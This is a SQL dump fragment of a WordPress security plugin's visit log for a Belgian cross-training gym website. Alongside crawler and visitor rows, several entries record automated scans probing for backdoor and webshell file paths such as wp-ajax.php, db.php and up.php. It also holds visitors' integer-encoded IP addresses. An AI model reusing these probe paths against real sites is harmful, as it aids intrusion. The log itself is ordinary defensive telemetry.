(74361, 1496436089.024448, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74362, 1496440621.746406, 621390105, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/logo_img.php', 'http://crosstrainingcenter.be/wp-includes/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74363, 1496440978.939087, 629981398, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/security.php', 'http://crosstrainingcenter.be/wp-content/security.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74364, 1496440992.402769, 3569402886, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/etc.php', 'http://crosstrainingcenter.be/wp-content/plugins/etc.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74365, 1496443717.087409, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74366, 1496443718.474457, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74367, 1496445236.418307, 1603019490, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/wp-ajax.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/wp-ajax.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74368, 1496447395.539241, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74369, 1496448806.026498, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74370, 1496448806.674161, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74371, 1496449481.309172, 844599431, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made1/wp-ajax.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made1/wp-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74372, 1496449789.230225, 2918037896, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/class-wp-contact.php', 'http://crosstrainingcenter.be/wp-includes/class-wp-contact.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74373, 1496451966.974415, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74374, 1496451967.421686, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74375, 1496453796.788938, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74376, 1496454555.324121, 3639891570, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/konzept/style.css', 'http://crosstrainingcenter.be/wp-content/themes/konzept/style.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(74377, 1496455752.878031, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(74378, 1496458420.611302, 629981398, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/kuma/db.php', 'http://crosstrainingcenter.be/wp-content/themes/kuma/db.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74379, 1496458565.807267, 1822917694, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/js_composer/vendor/composer/config.php', 'http://crosstrainingcenter.be/wp-content/plugins/js_composer/vendor/composer/config.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74380, 1496459312.310966, 3097104020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/security.php', 'http://crosstrainingcenter.be/wp-includes/security.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74381, 1496462618.769782, 1540278613, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/etc.php', 'http://crosstrainingcenter.be/wp-content/uploads/etc.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74382, 1496465136.834126, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/41.0.2272.118 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74383, 1496466884.846978, 784084240, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/kuma/figure.php', 'http://crosstrainingcenter.be/wp-content/themes/kuma/figure.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74384, 1496470458.832702, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74385, 1496471687.578849, 1538457750, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74386, 1496471689.449353, 1538457750, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74387, 1496471708.829023, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74388, 1496471725.221151, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74389, 1496471728.652542, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(74390, 1496471731.412677, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/content-wrapper.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/content-wrapper.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74391, 1496471731.415687, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74392, 1496471733.875052, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74393, 1496471741.469288, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74394, 1496471753.708265, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74395, 1496471852.259284, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74396, 1496472036.256916, 1428090969, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp_module/wp_msg.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp_module/wp_msg.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74397, 1496472155.353655, 1475089271, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/plugin/info.php', 'http://crosstrainingcenter.be/wp-content/plugins/plugin/info.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74398, 1496472173.667993, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74399, 1496474142.434178, 1570674758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74400, 1496474143.165216, 2996488203, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74401, 1496479887.140412, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/etc.php', 'http://crosstrainingcenter.be/wp-content/etc.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74402, 1496479978.293330, 2915925356, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/clubblog/db.php', 'http://crosstrainingcenter.be/wp-content/themes/clubblog/db.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74403, 1496483267.107339, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74404, 1496485916.080598, 3652605758, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/jm-ajax/upload_file/', '', 'python-requests/2.17.3'),
(74405, 1496492064.029907, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74406, 1496492310.043855, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(74407, 1496492645.592071, 621375758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74408, 1496502757.865902, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/wp-ajax.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/wp-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74409, 1496506060.010294, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74410, 1496506060.670739, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74411, 1496506061.258037, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74412, 1496506061.750872, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74413, 1496506062.441260, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74414, 1496506062.980556, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74415, 1496506063.660457, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74416, 1496506064.176041, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74417, 1496506064.590760, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74418, 1496506065.040917, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74419, 1496506065.565043, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74420, 1496506080.200439, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(74421, 1496506080.705037, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(74422, 1496508183.284626, 2994779638, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-conde.php', 'http://crosstrainingcenter.be/wp-conde.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(74423, 1496508498.542460, 3024883598, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74424, 1496512596.581382, 1426952777, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74425, 1496518488.780590, 2509961569, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwi76taltaLUAhWOJlAKHYFbCsYQFghcMAg&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Fles-seances-namur%2F&usg=AFQjCNF3CZXOTpgEhukKBcCq_alqy9J0kw', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; MAARJS; rv:11.0) like Gecko'),
(74426, 1496518491.197263, 2509961569, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MAARJS; rv:11.0) like Gecko'),
(74427, 1496524320.113890, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74428, 1496524405.577836, 1539837082, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),
(74429, 1496524693.950064, 2366148185, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74430, 1496527456.055001, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(74431, 1496527456.652773, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74432, 1496527457.522520, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74433, 1496527457.924437, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74434, 1496527458.407391, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74435, 1496527458.813067, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74436, 1496527459.220317, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74437, 1496527459.667286, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74438, 1496527460.057175, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74439, 1496527460.451590, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74440, 1496527461.218355, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74441, 1496527461.797972, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74442, 1496527462.205596, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74443, 1496527462.621908, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74444, 1496531442.907104, 1584253342, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&h=ATMCiN1_VR4ckpyeGlY1eJC-lGKtzk5ln3bC3heM0qy062QPCNahPwWb1YSpUozEzFaEA7YzgiF_ixRtGSrXtj2YMnQagFDvR7s', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/95.0.0.54.70;FBBV/59901094;FBDV/iPhone8,1;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(74445, 1496531449.417555, 1584253342, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/95.0.0.54.70;FBBV/59901094;FBDV/iPhone8,1;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(74446, 1496535278.854570, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74447, 1496536229.630824, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74448, 1496538987.025265, 1338303090, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74449, 1496542212.463038, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74450, 1496551954.458852, 2303381358, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74451, 1496551969.345297, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74452, 1496556611.513206, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74453, 1496556612.076730, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74454, 1496556612.617011, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74455, 1496556613.184675, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74456, 1496556613.695368, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74457, 1496556614.267428, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74458, 1496556614.858747, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74459, 1496556615.303529, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74460, 1496556615.783100, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74461, 1496556616.227796, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74462, 1496556616.689334, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74463, 1496572272.055687, 3233510666, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/ubh/up.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(74464, 1496572274.755654, 3233510666, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/ubh/up.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(74465, 1496578525.396366, 3475901867, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74466, 1496590526.391802, 3325711418, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
